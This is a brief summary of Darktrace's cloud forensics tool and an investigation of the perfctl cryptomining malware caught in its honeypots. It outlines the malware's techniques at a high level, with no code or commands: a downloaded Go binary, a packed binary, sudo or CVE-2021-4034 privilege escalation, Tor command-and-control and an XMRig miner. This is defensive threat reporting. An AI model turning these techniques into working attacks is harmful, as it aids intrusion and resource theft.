DARKTRACE’S Forensic Acquisition & Investigation (FAI) is described as an automated cloud-forensic solution that rapidly investigates a compromised cloud server by pulling data from Darktrace’s Cloudypots honeypot network, which observes attacker activity in real time across cloud services.
When a honeypot is compromised, a forensic copy of the virtual server’s disk is preserved, then imported and analysed via FAI to produce attacker timelines and root-cause analysis, all performed cloud-natively without extra configuration. The system imports artifacts from EC2, ECS, S3 and other sources, storing the raw disk image in an S3 bucket for direct import into FAI, with evidence and key event counts visible in the Evidence tab.
In the showcased investigation, alarms were generated for suspicious Base64 arguments in Selenium, and analysts pivoted through the timeline to retrieve the full payload, which was decoded with CyberChef to reveal the attacker’s script. The campaign featured a malware variant named perfctl, which downloads a Go binary from a remote host, uses a UPX-packed binary with a hooked header, and can escalate via sudo or CVE-2021-4034, ultimately attempting a C2 through Tor and launching an XMRig miner. Darktrace notes that Cloudypots observed 1,959 infections of the perfectl campaign across its honeypot network in the past year.